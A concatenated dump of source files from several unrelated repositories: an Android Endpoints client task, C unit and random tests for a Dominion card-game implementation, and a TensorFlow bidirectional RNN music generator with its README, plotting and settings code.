import com.example.jokeandroidlibrary.JokeAndroidActivity;
import com.google.api.client.extensions.android.http.AndroidHttp;
import com.google.api.client.extensions.android.json.AndroidJsonFactory;
import com.google.api.client.googleapis.services.AbstractGoogleClientRequest;
import com.google.api.client.googleapis.services.GoogleClientRequestInitializer;
import com.udacity.gradle.builditbigger.backend.myApi.MyApi;
import java.io.IOException;
public class EndpointsAsyncTask extends AsyncTask<Void, Void, String> {
private static MyApi myApiService = null;
Context context;
public EndpointsAsyncTask (Context context){
this.context = context.getApplicationContext();
}
@Override
protected void onPostExecute(String joke) {
Intent intent = new Intent(context, JokeAndroidActivity.class);
intent.putExtra("joke", joke);
context.startActivity(intent);
}
@Override
protected String doInBackground(Void... voids) {
if(myApiService == null) { // Only do this once
MyApi.Builder builder = new MyApi.Builder(AndroidHttp.newCompatibleTransport(),
new AndroidJsonFactory(), null)
.setRootUrl("http://10.0.2.2:8080/_ah/api/")
.setGoogleClientRequestInitializer(new GoogleClientRequestInitializer() {
@Override
public void initialize(AbstractGoogleClientRequest<?> abstractGoogleClientRequest) throws IOException {
abstractGoogleClientRequest.setDisableGZipContent(true);
}
});
// end options for devappserver
myApiService = builder.build();
}
try {
return myApiService.tellJoke().execute().getData();
} catch (IOException e) {
return e.getMessage();
}
}
}
|
c46e37bb3ea147e945009f8c3e748cf7467e147f
|
[
"Java"
] | 1 |
Java
|
StarkAndroid/FinalProject2
|
8d3fb98cfc91c16707d2b66e17547c927b443b6a
|
60abdd6ce61e124ea39d438276c81d58c1865b1f
|
refs/heads/master
|
<file_sep>/*
<NAME>
4/28/2018
CS 362
Testing Adventurer Card
*/
#include <stdlib.h>
#include <stdio.h>
#include "assert.h"
#include "dominion.h"
#include "rngs.h"
#include "unit.h"
#include <time.h>
#include <math.h>
int main (int argc, char** argv) {
struct gameState state;
int players = 2;
int seed = 100;
int choice1 = 0; // not used for adventurer
int choice2 = 0; // not used for adventurer
int choice3 = 0; // not used for adventurer
int handPos = 0; // not used for adventurer
int bonus = 0; // not used for adventurer
int k[10] = {adventurer, gardens, embargo, village, minion, mine, cutpurse,
sea_hag, tribute, smithy};
printf("____________________________________________________\n");
printf("Testing adventurer card\n\n");
fflush(stdout);
// init game
initializeGame(players, k, seed, &state);
int handCountBefore = numHandCards(&state);
printf("\tplay adventurer successfully executes:\n");
fflush(stdout);
int played = (cardEffect(adventurer, choice1, choice2, choice3, &state, handPos, &bonus) == 0);
asserttrue(played);
int handCountAfter = numHandCards(&state);
printf("\tcorrect number of cards in hand:\n");
fflush(stdout);
printf("\t\ttcards in hand before: %d", handCountBefore);
printf("\n\t\tcards in hand after: %d\n", handCountAfter);
//TODO: Implement treasure/coin counter to see if there
// is more treasure in hand after card is played.
// for (i = 0; i < state->handCount[player]; i++)
// {
// if (state->hand[player][i] == copper)
// {
// state->coins += 1;
// }
// else if (state->hand[player][i] == silver)
// {
// state->coins += 2;
// }
// else if (state->hand[player][i] == gold)
// {
// state->coins += 3;
// }
// }
asserttrue((handCountAfter - handCountBefore) == 2);
printf("____________________________________________________\n");
return 0;
}
// adding own asserttrue as recommended
void asserttrue(int statement) {
if (statement) {
printf("\t\tTEST SUCCESSFULLY COMPLETED”\n");
fflush(stdout);
} else {
printf("\t\tTEST FAILED\n");
fflush(stdout);
}
}<file_sep>/*
<NAME>
4/28/2018
CS 362
This is testing the cost of the cards, to ensure that they are the correct amount as specified in the game, according to domionion
*/
#include <stdlib.h>
#include <stdio.h>
#include "assert.h"
#include "dominion.h"
#include "rngs.h"
#include "unit.h"
#include <time.h>
#include <math.h>
void testCard(int statement);
int main(int argc, char* argv[]) {
printf("____________________________________________________\n");
printf("Testing getCost function");
printf("curse cost:");
testCard(getCost(curse) == 0);
printf("curse cost:");
testCard(getCost(curse) == 0);
printf("estate cost:");
testCard(getCost(estate) == 2);
printf("duchy cost:");
testCard(getCost(duchy) == 5);
printf("province cost:");
testCard(getCost(province) == 8);
printf("copper cost:");
testCard(getCost(copper) == 0);
printf("silver cost:");
testCard(getCost(silver) == 3);
printf("gold cost:");
testCard(getCost(gold) == 6);
printf("adventurer cost:");
testCard(getCost(adventurer) == 6);
printf("council_room cost:");
testCard(getCost(council_room) == 5);
printf("feast cost:");
testCard(getCost(feast) == 4);
printf("gardens cost:");
testCard(getCost(gardens) == 4);
printf("mine cost:");
testCard(getCost(mine) == 5);
printf("remodel cost:");
testCard(getCost(remodel) == 4);
printf("smithy cost:");
testCard(getCost(smithy) == 4);
printf("village cost:");
testCard(getCost(village) == 3);
printf("baron cost:");
testCard(getCost(baron) == 4);
printf("great_hall cost:");
testCard(getCost(great_hall) == 3);
printf("minion cost:");
testCard(getCost(minion) == 5);
printf("steward cost:");
testCard(getCost(steward) == 3);
printf("tribute cost:");
testCard(getCost(tribute) == 5);
printf("ambassador cost:");
testCard(getCost(ambassador) == 3);
printf("cutpurse cost:");
testCard(getCost(cutpurse) == 4);
printf("embargo cost:");
testCard(getCost(embargo) == 2);
printf("outpost cost:");
testCard(getCost(outpost) == 5);
printf("salvager cost:");
testCard(getCost(salvager) == 4);
printf("sea_hag cost:");
testCard(getCost(sea_hag) == 4);
printf("treasure_map cost:");
testCard(getCost(treasure_map) == 4);
printf("other cost:");
testCard(getCost(treasure_map + 1) == -1);
printf("____________________________________________________\n");
return 0;
}
void testCard(int statement) {
if (statement) {
printf("\t\tTEST SUCCESSFULLY COMPLETED\n");
fflush(stdout);
} else {
printf("\t\tTEST FAILED\n");
fflush(stdout);
}
}<file_sep>/*
<NAME>
4/28/2018
CS 362
This is a unit test for the whoseTurn function. whoseTurn is an
int function that dictates
*/
#include <stdlib.h>
#include <stdio.h>
#include "assert.h"
#include "dominion.h"
#include "rngs.h"
#include "unit.h"
#include <time.h>
#include <math.h>
int main(){
struct gameState state;
int turn = 0;
int s = 0;
int i=0;
for(i = 0; i < 15; i++){
state.whoseTurn = turn;
s = whoseTurn(&state);
assert(s == turn);
turn++;
}
printf("____________________________________________________\n\n");
printf("\n\tTesting whoseTurn function");
printf("\n\tThe test for whoseTurn PASSED \n");
printf("____________________________________________________\n\n");
return 0;
}<file_sep>/*
<NAME>
4/28/2018
CS 362
Testing village Card
*/
#include <stdlib.h>
#include <stdio.h>
#include "assert.h"
#include "dominion.h"
#include "rngs.h"
#include "unit.h"
#include <time.h>
#include <math.h>
void asserttrue(int statement);
int main(int argc, char** argv){
printf("____________________________________________________\n");
printf("Testing village card");
struct gameState state;
int choice1 = 0, choice2 = 0, choice3 = 0, handPos=0, bonus=0, actions;
int temp;
int k[10] = {adventurer, village, embargo, village, minion, mine, cutpurse,
sea_hag, steward, smithy};
initializeGame(2, k, 2, &state);
int handCountBefore = numHandCards(&state);
temp = numHandCards(&state);
int played = (cardEffect(village, choice1, choice2, choice3, &state, handPos, &bonus) == 0);
printf("\n\tplay village successfully executes:\n");
asserttrue(played);
printf("\tcorrect number of actions:\n");
asserttrue(state.numActions == 2);
int handCountAfter = numHandCards(&state);
printf("\tcorrect number of cards in hand:\n");
fflush(stdout);
asserttrue((handCountBefore - handCountAfter) == 1);
printf("____________________________________________________\n");
return 0;
}
// adding own asserttrue as recommended
void asserttrue(int statement) {
if (statement) {
printf("\t\tTEST SUCCESSFULLY COMPLETED\n");
fflush(stdout);
} else {
printf("\t\tTEST FAILED\n");
fflush(stdout);
}
}<file_sep>/*
<NAME>
4/28/2018
CS 362
Testing buyCard()
*/
#include <stdlib.h>
#include <stdio.h>
#include "assert.h"
#include "dominion.h"
#include "rngs.h"
#include "unit.h"
#include <time.h>
#include <math.h>
int main(){
struct gameState state;
int s;
int k[10] = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10};
initializeGame(2, k, 2, &state);
printf("____________________________________________________\n\n");
printf("Testing buyCard().\n");
state.numBuys = 0;
s = buyCard(5, &state);
assert(s == -1);
state.numBuys = 5;
state.coins = 0;
s = buyCard(5, &state);
assert(s == -1);
state.coins = 100;
s = buyCard(5, &state);
asserttrue(s == 0);
printf("____________________________________________________\n\n");
return 0;
}
// adding own asserttrue as recommended
void asserttrue(int statement) {
if (statement) {
printf("\t\tTEST SUCCESSFULLY COMPLETED\n");
fflush(stdout);
} else {
printf("\t\tTEST FAILED\n");
fflush(stdout);
}
}<file_sep>/*
<NAME>
4/28/2018
CS 362
Testing Smithy Card
*/
#include "dominion.h"
#include "dominion_helpers.h"
#include "interface.h"
#include "rngs.h"
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#define NUM_TESTS 1000
// testing smithy card
int asserttrue(int statement);
int main(int argc, char* argv[]) {
time_t t;
// Intializes random number generator
srand((unsigned) time(&t));
int handSuccess = 0;
int deckSuccess = 0;
printf("____________________________________________________________________\n");
printf("Testing Smithy card\n\n");
fflush(stdout);
int i;
for (i = 0; i < NUM_TESTS; i++) {
struct gameState state;
int players = 2;
int seed = rand();
int choice1 = 0; // not used for smithy
int choice2 = 0; // not used for smithy
int choice3 = 0; // not used for smithy
int handPos = 0;
int bonus = 0; // not used for smithy
int k[10] = {adventurer, gardens, embargo, village, minion, mine, cutpurse,
sea_hag, tribute, smithy};
// init game
initializeGame(players, k, seed, &state);
int handCountBefore = numHandCards(&state);
int deckCountBefore = state.deckCount[0];
// int discardCountBefore = state.discardCount[0];
int played = (cardEffect(smithy, choice1, choice2, choice3, &state, handPos, &bonus) == 0);
asserttrue(played);
int handCountAfter = numHandCards(&state);
int deckCountAfter = state.deckCount[0];
// int discardCountAfter = state.discardCount[0];
// 2 because + 3 and we played 1.
handSuccess += asserttrue((handCountAfter - handCountBefore) == 2);
// 4 because we drew 3, would have to add for discard if
// that was being set - may be a bug for future investigation
deckSuccess += asserttrue((deckCountBefore - deckCountAfter) == 4);
}
// tallied results
printf("\tcorrect number of cards in hand: %d of %d times.\n", handSuccess, NUM_TESTS);
fflush(stdout);
printf("\tcorrect number of cards in deck: %d of %d times.\n", deckSuccess, NUM_TESTS);
fflush(stdout);
printf("____________________________________________________________________\n");
return 0;
}
// adding own asserttrue as recommended
int asserttrue(int statement) {
if (statement) {
return TRUE;
} else {
return FALSE;
}
}<file_sep>
CFLAGS = -Wall -fpic -coverage -lm
testme: testme.c
gcc -o testme testme.c $(CFLAGS)
all: testme
default: testme
clean:
rm -f *.o testme *.gcov *.gcda *.gcno *.so *.out <file_sep>/*
<NAME>
4/28/2018
CS 362
Testing smithy Card
*/
#include <stdlib.h>
#include <stdio.h>
#include "assert.h"
#include "dominion.h"
#include "rngs.h"
#include "unit.h"
#include <time.h>
#include <math.h>
void asserttrue(int statement);
int main(int argc, char** argv){
printf("____________________________________________________\n");
printf("Testing smithy card");
struct gameState state;
int choice1 = 0, choice2 = 0, choice3 = 0, handPos=0, bonus=0;
int temp;
int k[10] = {adventurer, gardens, embargo, village, minion, mine, cutpurse,
sea_hag, tribute, smithy};
initializeGame(2, k, 2, &state);
temp = numHandCards(&state);
int played = (cardEffect(smithy, choice1, choice2, choice3, &state, handPos, &bonus) == 0);
printf("\n\tplay adventurer successfully executes:\n");
asserttrue(played);
//make sure 3 cards were drawn
printf("\tcorrect number of cards in hand:\n");
asserttrue(numHandCards(&state) == temp + 2);
printf("____________________________________________________\n");
return 0;
}
// adding own asserttrue as recommended
void asserttrue(int statement) {
if (statement) {
printf("\t\tTEST SUCCESSFULLY COMPLETED”\n");
fflush(stdout);
} else {
printf("\t\tTEST FAILED\n");
fflush(stdout);
}
}<file_sep> <NAME>
wrighch3
<file_sep>default: test
./test
test: testme.c
gcc -o test testme.c
clean:
rm -f ./test<file_sep>/*
<NAME>
4/28/2018
CS 362
Testing Embargo Card
*/
#include "dominion.h"
#include "dominion_helpers.h"
#include "interface.h"
#include "rngs.h"
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#define NUM_TESTS 1000
int asserttrue(int statement);
int main(int argc, char* argv[]) {
time_t t;
// Intializes random number generator
srand((unsigned) time(&t));
int execSuccess = 0;
int tokenSuccess = 0;
int cardSuccess = 0;
int coinSuccess = 0;
printf("____________________________________________________________________\n");
printf("Testing Embargo\n\n");
fflush(stdout);
int i;
for (i = 0; i < NUM_TESTS; i++) {
struct gameState state;
int players = 2;
int seed = rand();
int choice1 = rand() % (treasure_map + 2);
int choice2 = 0; // not used for embargo
int choice3 = 0; // not used for embargo
int handPos = 0;
int bonus = 0; // not used for embargo
int k[10] = {adventurer, gardens, embargo, village, minion, mine, cutpurse,
sea_hag, tribute, smithy};
initializeGame(players, k, seed, &state);
int embargoCountBefore = state.embargoTokens[choice1];
int handCountBefore = numHandCards(&state);
int cointCountBefore = state.coins;
int played = (cardEffect(embargo, choice1, choice2, choice3, &state, handPos, &bonus) == 0);
execSuccess += asserttrue(played);
int embargoCountAfter = state.embargoTokens[choice1];
int handCountAfter = numHandCards(&state);
int cointCountAfter = state.coins;
tokenSuccess += asserttrue((embargoCountAfter - embargoCountBefore) == 1);
cardSuccess += asserttrue((handCountBefore - handCountAfter) == 1);
coinSuccess += asserttrue((cointCountAfter - cointCountBefore) == 2);
}
// tallied results
printf("\tplay embargo successfully executes: %d of %d times.\n", execSuccess, NUM_TESTS);
fflush(stdout);
printf("\tcorrect number of embargo tokens: %d of %d times.\n", tokenSuccess, NUM_TESTS);
fflush(stdout);
printf("\tcorrect number of cards in hand: %d of %d times.\n", cardSuccess, NUM_TESTS);
fflush(stdout);
printf("\tcorrect number of coins: %d of %d times.\n", coinSuccess, NUM_TESTS);
fflush(stdout);
printf("____________________________________________________________________\n");
return 0;
}
// adding own asserttrue as recommended
int asserttrue(int statement) {
if (statement) {
return TRUE;
} else {
return FALSE;
}
}<file_sep>/*
<NAME>
4/28/2018
CS 362
Unit test for isGameOver function()
*/
#include <stdlib.h>
#include <stdio.h>
#include "assert.h"
#include "dominion.h"
#include "rngs.h"
#include "unit.h"
#include <time.h>
int main(){
struct gameState state;
int s;
int k[10] ={1,2,3,4,5,6,7,8,9,10};
initializeGame(2,k,2,&state);
state.supplyCount[province]=0;
s=isGameOver(&state);
assert(s==1);
printf("____________________________________________________\n\n");
printf("Testing isGameOver function");
printf("isGameOver has passed, province is at 0, the game is over\n");
state.supplyCount[1] = 0;
state.supplyCount[4] = 0;
state.supplyCount[7] = 0;
s = isGameOver(&state);
assert(s == 1);
printf("The game is over, 3 piles of cards are empty.\n");
printf("____________________________________________________\n");
return 0;
}<file_sep>/*
<NAME>
4/28/2018
CS 362
Testing Adventurer Card
*/
#include <stdlib.h>
#include <stdio.h>
#include "assert.h"
#include "dominion.h"
#include "rngs.h"
#include "dominion_helpers.h"
#include "interface.h"
#include "unit.h"
#include <time.h>
#include <math.h>
#define NUM_TESTS 20
int asserttrue(int statement);
int countDeckTreasure(struct gameState *state);
int main (int argc, char** argv) {
time_t t;
// Intializes random number generator
srand((unsigned) time(&t));
int execSuccess = 0;
int cardSuccess = 0;
printf("____________________________________________________\n");
printf("Testing adventurer card\n\n");
fflush(stdout);
int i;
for(i=0; i<NUM_TESTS; i++){
struct gameState state;
int players = 2;
int seed = rand();
int choice1 = 0; // not used for adventurer
int choice2 = 0; // not used for adventurer
int choice3 = 0; // not used for adventurer
int handPos = 0; // not used for adventurer
int bonus = 0; // not used for adventurer
int k[10] = {adventurer, gardens, embargo, village, minion, mine, cutpurse,
sea_hag, tribute, smithy};
// init game
initializeGame(players, k, seed, &state);
int handCountBefore = numHandCards(&state);
int deckTreasureBefore = countDeckTreasure(&state);
int played = (cardEffect(adventurer, choice1, choice2, choice3, &state, handPos, &bonus) == 0);
execSuccess += asserttrue(played);
int handCountAfter = numHandCards(&state);
int cardsToDraw = (deckTreasureBefore > 2) ? 2: deckTreasureBefore;
cardSuccess += asserttrue((handCountAfter - handCountBefore) == cardsToDraw);
}
// tallied results
printf("\tplay adventurer successfully executed: %d of %d times.\n", execSuccess, NUM_TESTS);
fflush(stdout);
printf("\tcorrect number of cards in hand: %d of %d times.\n", cardSuccess, NUM_TESTS);
fflush(stdout);
printf("____________________________________________________\n");
return 0;
}
// adding own asserttrue as recommended
int asserttrue(int statement) {
if (statement) {
return TRUE;
} else {
return FALSE;
}
}
// counts the treasure that can be drawn
int countDeckTreasure(struct gameState *state) {
int count = 0;
int i;
for (i = 0; i < state->deckCount[state->whoseTurn]; i++) {
// test if treasure
switch(state->deck[state->whoseTurn][i]) {
case copper:
case silver:
case gold:
count++;
}
}
return count;
}<file_sep>#ifndef _UNIT_H
#define _UNIT_H
#include "dominion.h"
int whoseTurn(struct gameState *state);
int drawCard(int player, struct gameState* state);
int updateCoins(int player, struct gameState* state, int bonus);
int discardCard(int handPos, int currentPlayer, struct gameState* state,
int trashFlag);
int gainCard(int supplyPos, struct gameState* state, int toFlag, int player);
int getCost(int cardNumber);
int cardEffect(int card, int choice1, int choice2, int choice3,
struct gameState* state, int handPos, int* bonus);
int playSmithy(int currentPlayer, struct gameState* state, int handPos);
int playCutpurse(int currentPlayer, struct gameState* state, int handPos);
int playAdventurer(int currentPlayer, struct gameState* state);
int playEmbargo(int currentPlayer, struct gameState* state, int handPos, int choice1);
int playTribute(int currentPlayer, struct gameState* state);
#endif
<file_sep>Name: <NAME>, onid: guzmannj
|
a4970f41c69bd39472f40c0357a7ad08a3a873b7
|
[
"Markdown",
"C",
"Makefile"
] | 15 |
C
|
DeadCatLady/CS362-004-S2018
|
435c36ee40eec42ab2ddf15e0a0b063286fb82a1
|
c211f7e1e14ebde9a25be51776ecdefd2289a351
|
refs/heads/master
|
<repo_name>younus21/class<file_sep>/BoxDemo.java
package Cheaprer6;
public class BoxDemo {
public static void main(String[] args) {
// TODO Auto-generated method stub
Box1 mybox = new Box1();
double vol;
// assign values to mybox's instance variables
mybox.width = 10;
mybox.height = 20;
mybox.depth = 15;
// compute volume of box
vol = mybox.width * mybox.height * mybox.depth;
System.out.println("Volume is " + vol);
}
}
<file_sep>/BoxDemo2.java
package Cheaprer6;
public class BoxDemo2 {
public static void main(String[] args) {
// TODO Auto-generated method stub
BoxDemo3 mybox1 = new BoxDemo3();
BoxDemo3 mybox2 = new BoxDemo3();
mybox1.setdim(10,20,30);
mybox2.setdim(10,2,3);
double vol1,vol2;
vol1 = mybox1.younus();
System.out.println(vol1);
vol2 = mybox2.younus();
System.out.println(vol2);
}
}
|
5eede1c748e49d36d35963988907c39e561df8dc
|
[
"Java"
] | 2 |
Java
|
younus21/class
|
51bd3394a695eacaeecf9e48988cf9e611d0b9ca
|
422e39a0db8e1056e528d7990b3bfc21110dc880
|
refs/heads/master
|
<file_sep>const _ = require('underscore');
const checkTypes = require('check-types');
import { CanDeployOptions } from '../can-deploy';
import { MessageOptions } from '../message';
import { PublisherOptions } from '../publisher';
import { ServiceOptions } from '../service';
import { VerifierOptions } from '../verifier';
export type SpawnArguments =
| CanDeployOptions[]
| MessageOptions
| PublisherOptions
| ServiceOptions
| VerifierOptions
| {}; // Empty object is allowed to make tests less noisy. We should change this in the future
export const DEFAULT_ARG = 'DEFAULT';
export class Arguments {
public toArgumentsArray(
args: SpawnArguments,
mappings: { [id: string]: string },
): string[] {
return _.chain(args instanceof Array ? args : [args])
.map((x: SpawnArguments) => this.createArgumentsFromObject(x, mappings))
.flatten()
.value();
}
private createArgumentsFromObject(
args: SpawnArguments,
mappings: { [id: string]: string },
): string[] {
return _.chain(args)
.reduce((acc: any, value: any, key: any) => {
if (value && mappings[key]) {
let mapping = mappings[key];
let f = acc.push.bind(acc);
if (mapping === DEFAULT_ARG) {
mapping = '';
f = acc.unshift.bind(acc);
}
_.map(checkTypes.array(value) ? value : [value], (v: any) =>
f([mapping, `'${v}'`]),
);
}
return acc;
}, [])
.flatten()
.compact()
.value();
}
}
export default new Arguments();
<file_sep>// tslint:disable:no-string-literal
import cp = require('child_process');
import { ChildProcess, SpawnOptions } from 'child_process';
import * as path from 'path';
import logger from '../logger';
import pactEnvironment from '../pact-environment';
import argsHelper, { SpawnArguments } from './arguments';
const _ = require('underscore');
export class Spawn {
public get cwd(): string {
return path.resolve(__dirname, '..');
}
public spawnBinary(
command: string,
args: SpawnArguments = {},
argMapping: { [id: string]: string } = {},
): ChildProcess {
const envVars = JSON.parse(JSON.stringify(process.env)); // Create copy of environment variables
// Remove environment variable if there
// This is a hack to prevent some weird Travelling Ruby behaviour with Gems
// https://github.com/pact-foundation/pact-mock-service-npm/issues/16
delete envVars['RUBYGEMS_GEMDEPS'];
let file: string;
let opts: SpawnOptions = {
cwd: pactEnvironment.cwd,
detached: !pactEnvironment.isWindows(),
env: envVars,
};
let cmd: string = [command]
.concat(argsHelper.toArgumentsArray(args, argMapping))
.join(' ');
let spawnArgs: string[];
if (pactEnvironment.isWindows()) {
file = 'cmd.exe';
spawnArgs = ['/s', '/c', cmd];
(opts as any).windowsVerbatimArguments = true;
} else {
cmd = `./${cmd}`;
file = '/bin/sh';
spawnArgs = ['-c', cmd];
}
logger.debug(
`Starting pact binary with '${_.flatten([
file,
spawnArgs,
JSON.stringify(opts),
])}'`,
);
const instance = cp.spawn(file, spawnArgs, opts);
instance.stdout.setEncoding('utf8');
instance.stderr.setEncoding('utf8');
instance.stdout.on('data', logger.debug.bind(logger));
instance.stderr.on('data', logger.debug.bind(logger));
instance.on('error', logger.error.bind(logger));
instance.once('close', code => {
if (code !== 0) {
logger.warn(`Pact exited with code ${code}.`);
}
});
logger.info(`Created '${cmd}' process with PID: ${instance.pid}`);
return instance;
}
public killBinary(binary: ChildProcess): boolean {
if (binary) {
const pid = binary.pid;
logger.info(`Removing Pact with PID: ${pid}`);
binary.removeAllListeners();
// Killing instance, since windows can't send signals, must kill process forcefully
try {
pactEnvironment.isWindows()
? cp.execSync(`taskkill /f /t /pid ${pid}`)
: process.kill(-pid, 'SIGINT');
} catch (e) {
return false;
}
}
return true;
}
}
export default new Spawn();
<file_sep>import q = require('q');
import logger from './logger';
import spawn from './spawn';
import pactStandalone from './pact-standalone';
import * as _ from 'underscore';
const checkTypes = require('check-types');
export class CanDeploy {
public static convertForSpawnBinary(
options: CanDeployOptions,
): CanDeployOptions[] {
// This is the order that the arguments must be in, everything else is afterwards
const keys = ['participant', 'participantVersion', 'latest', 'to'];
// Create copy of options, while omitting the arguments specified above
const args: CanDeployOptions[] = [_.omit(options, keys)];
// Go backwards in the keys as we are going to unshift them into the array
keys.reverse().forEach(key => {
const val: any = options[key];
if (options[key] !== undefined) {
const obj: any = {};
obj[key] = val;
args.unshift(obj);
}
});
return args;
}
public readonly options: CanDeployOptions;
private readonly __argMapping = {
participant: '--pacticipant',
participantVersion: '--version',
latest: '--latest',
to: '--to',
pactBroker: '--broker-base-url',
pactBrokerToken: '--broker-token',
pactBrokerUsername: '--broker-username',
pactBrokerPassword: <PASSWORD>',
output: '--output',
verbose: '--verbose',
retryWhileUnknown: '--retry-while-unknown',
retryInterval: '--retry-interval',
};
constructor(options: CanDeployOptions) {
options = options || {};
// Setting defaults
options.timeout = options.timeout || 60000;
checkTypes.assert.nonEmptyString(
options.participant,
'Must provide the participant argument',
);
checkTypes.assert.nonEmptyString(
options.participantVersion,
'Must provide the participant version argument',
);
checkTypes.assert.nonEmptyString(
options.pactBroker,
'Must provide the pactBroker argument',
);
options.latest !== undefined &&
checkTypes.assert.nonEmptyString(options.latest.toString());
options.to !== undefined && checkTypes.assert.nonEmptyString(options.to);
options.pactBrokerToken !== undefined &&
checkTypes.assert.nonEmptyString(options.pactBrokerToken);
options.pactBrokerUsername !== undefined &&
checkTypes.assert.string(options.pactBrokerUsername);
options.pactBrokerPassword !== undefined &&
checkTypes.assert.string(options.pactBrokerPassword);
if (
(options.pactBrokerUsername && !options.pactBrokerPassword) ||
(options.pactBrokerPassword && !options.pactBrokerUsername)
) {
throw new Error(
'Must provide both Pact Broker username and password. None needed if authentication on Broker is disabled.',
);
}
this.options = options;
}
public canDeploy(): q.Promise<any> {
logger.info(
`Asking broker at ${this.options.pactBroker} if it is possible to deploy`,
);
const deferred = q.defer<string[]>();
const instance = spawn.spawnBinary(
`${pactStandalone.brokerPath} can-i-deploy`,
CanDeploy.convertForSpawnBinary(this.options),
this.__argMapping,
);
const output: any[] = [];
instance.stdout.on('data', l => output.push(l));
instance.stderr.on('data', l => output.push(l));
instance.once('close', code => {
const o = output.join('\n');
let success = false;
if (this.options.output === 'json') {
success = JSON.parse(o).summary.deployable;
} else {
success = /Computer says yes/gim.exec(o) !== null;
}
if (code === 0 || success) {
logger.info(o);
return deferred.resolve();
}
logger.error(`can-i-deploy did not return success message:\n${o}`);
return deferred.reject(new Error(o));
});
return deferred.promise.timeout(
this.options.timeout as number,
`Timeout waiting for verification process to complete (PID: ${instance.pid})`,
);
}
}
export default (options: CanDeployOptions) => new CanDeploy(options);
export interface CanDeployOptions {
participant?: string;
participantVersion?: string;
to?: string;
latest?: boolean | string;
pactBroker: string;
pactBrokerToken?: string;
pactBrokerUsername?: string;
pactBrokerPassword?: string;
output?: 'json' | 'table';
verbose?: boolean;
retryWhileUnknown?: number;
retryInterval?: number;
timeout?: number;
}
|
7d600117833480033efdaa25572e5f6f482ac3d9
|
[
"TypeScript"
] | 3 |
TypeScript
|
vgrigoruk/pact-node
|
bdb5baea57f278621cbccdb9bc48536525b7ab90
|
e87e295a301014f4a7e7b919bcb83ce72bc454c8
|
refs/heads/master
|
<repo_name>wangkunctc/Generate-Music-Bidirectional-RNN<file_sep>/README.md
# Generate-Music-Bidirectional-RNN
Generate Music using dynamic bidirectional recurrent neural network Tensorflow

This RNN model will generated 2 outputs, backward and forward. But this game, both are pretty same, different based on initial temperature generated.
```text
batch: 1, loss: 1.03366, speed: 23.2230839729 s / epoch
batch: 2, loss: 1.01434, speed: 22.9636318684 s / epoch
batch: 3, loss: 0.995827, speed: 22.9477238655 s / epoch
batch: 4, loss: 0.977869, speed: 22.9385609627 s / epoch
batch: 5, loss: 0.960333, speed: 22.9393310547 s / epoch
batch: 6, loss: 0.943209, speed: 22.9278440475 s / epoch
batch: 7, loss: 0.926511, speed: 22.9437839985 s / epoch
batch: 8, loss: 0.910224, speed: 22.9244501591 s / epoch
batch: 9, loss: 0.894379, speed: 22.9693090916 s / epoch
batch: 10, loss: 0.879009, speed: 22.9410529137 s / epoch
batch: 11, loss: 0.864144, speed: 23.2230038643 s / epoch
batch: 12, loss: 0.849706, speed: 23.0044908524 s / epoch
batch: 13, loss: 0.835787, speed: 23.0095338821 s / epoch
batch: 14, loss: 0.822327, speed: 23.1483099461 s / epoch
batch: 15, loss: 0.809317, speed: 23.0863668919 s / epoch
batch: 16, loss: 0.796733, speed: 23.0318582058 s / epoch
batch: 17, loss: 0.784547, speed: 23.0388588905 s / epoch
batch: 18, loss: 0.772794, speed: 23.0113451481 s / epoch
batch: 19, loss: 0.761443, speed: 23.0499649048 s / epoch
batch: 20, loss: 0.750422, speed: 23.054156065 s / epoch
```
### Some output




Wave generated seems nice actually, but not in the real sound compression. Just simply a noise try to mimic the real song. I will try to improve in the future.
<file_sep>/graph.py
import matplotlib.pyplot as plt
import seaborn as sns
sns.set(style="whitegrid", palette="muted")
import numpy as np
def generategraph(real_data, model, sess, samplerate, boundary, checkpoint = False):
initial = np.random.randint(0, real_data.shape[0] / 2)
fig = plt.figure(figsize = (10,15))
if checkpoint:
length = 10
else:
while True:
length = raw_input("insert length of sound(sec): ")
try:
length = int(length)
break
except:
print "enter INTEGER only"
plt.subplot(3, 1, 1)
plt.plot(real_data[initial : initial + (length * samplerate)])
plt.title("real music")
probs = model.step(sess, np.array([real_data[initial : initial + boundary]]), True)
backward_generated = probs[0, :].tolist()
forward_generated = probs[1, :].tolist()
for x in xrange(0, length * (samplerate / boundary)):
probs = model.step(sess, np.array([np.mean(probs, axis = 0)]), False)
backward_generated += probs[0, :].tolist()
forward_generated += probs[1, :].tolist()
plt.subplot(3, 1, 2)
plt.plot(backward_generated)
plt.title("left generated")
plt.subplot(3, 1, 3)
plt.plot(forward_generated)
plt.title("right generated")
fig.tight_layout()
plt.savefig('graph.png')
plt.savefig('graph.pdf')
<file_sep>/settings.py
import tensorflow as tf
tf.app.flags.DEFINE_integer("amplitude", 40, "increase the wave by this factor")
tf.app.flags.DEFINE_float("learning_rate", 0.00001, "Learning rate.")
tf.app.flags.DEFINE_integer("sound_batch_size", 1000, "Sound batch size to use during training.")
tf.app.flags.DEFINE_integer("checkpoint_epoch", 10, "Checkpoint to save and testing")
tf.app.flags.DEFINE_integer("max_epoch", 1000, "Limit on the size of training data (0: no limit).")
tf.app.flags.DEFINE_integer("size", 256, "Size of each model layer.")
tf.app.flags.DEFINE_integer("num_layers", 2, "Number of layers in the model.")
tf.app.flags.DEFINE_string("train_dir", "/home/husein/Generate-Music-Bidirectional-RNN/", "Training directory.")
tf.app.flags.DEFINE_string("data_dir", "/home/husein/Generate-Music-Recurrent-Neural-Network/data/", "data location.")
tf.app.flags.DEFINE_boolean("decode", False, "Set to True for interactive decoding.")
memory_duringtraining = 0.8
memory_duringtesting = 0.1
FLAGS = tf.app.flags.FLAGS
def get_data_type():
return tf.float64 if FLAGS.use_fp64 else tf.float32
config = tf.ConfigProto()
config.gpu_options.allocator_type = 'BFC'
if FLAGS.decode:
config.gpu_options.per_process_gpu_memory_fraction = memory_duringtesting
else:
config.gpu_options.per_process_gpu_memory_fraction = memory_duringtraining<file_sep>/utils.py
import numpy as np
import soundfile as sf
import os
def get_data_from_location(location, amplitude):
list_data = os.listdir(location)
if len(list_data) == 0:
print "not found any data, exiting.."
exit(0)
for i in list_data:
if i.find('.wav') < 0 and i.find('.flac') < 0:
print "Only support .WAV or .FLAC, exiting.."
exit(0)
samplerate = []
for i in list_data:
_, sample = sf.read(location + i)
samplerate.append(sample)
if len(set(samplerate)) > 1:
print "make sure all sample rate are same, exiting.."
exit(0)
data, samplerate = sf.read(location + list_data[0])
if len(data.shape) > 1:
data = data[:, 0]
